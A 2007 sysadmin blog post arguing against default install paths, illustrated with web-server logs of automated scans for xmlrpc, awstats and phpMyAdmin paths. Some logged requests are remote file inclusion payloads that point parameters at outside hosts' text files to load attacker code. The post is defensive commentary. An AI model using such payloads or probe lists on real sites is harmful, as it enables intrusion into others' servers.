Posted on by SYSMGR

Still thinking default?

Defaults are dangerous.
Therefore, in general, I consider installing packages on their default locations a bad idea. Having the locations writable is dangerous as well.
This is why:

130.91.197.190 - - [16/Apr/2007:15:02:47 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868

What if the file existed? That would mean the site had been compromised before. But since none of the packages exist – or reside on a different (not-so-obvious) place, these request did no more harm than using some CPU, memory and IO.
The same applies to the next requests, some time later:
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
...
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360

If I had packages installed on their default locations, how safe would I have been?
Not that I’m totally immune but at least, avoiding defaults secures the system against these simple attacks. Of course, who’s scanning the webs will locate the obvious. And of course, there is a [WORDPRESS] directory. But not here!

Some stupid thinking again: What does WAMP stand for: Windows/Apache/MySql/PhP?
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
80.237.144.181 - - [22/Apr/2007:13:24:43 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
Either they phoned, or he renewed his IP address, it’s just seconds in between.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.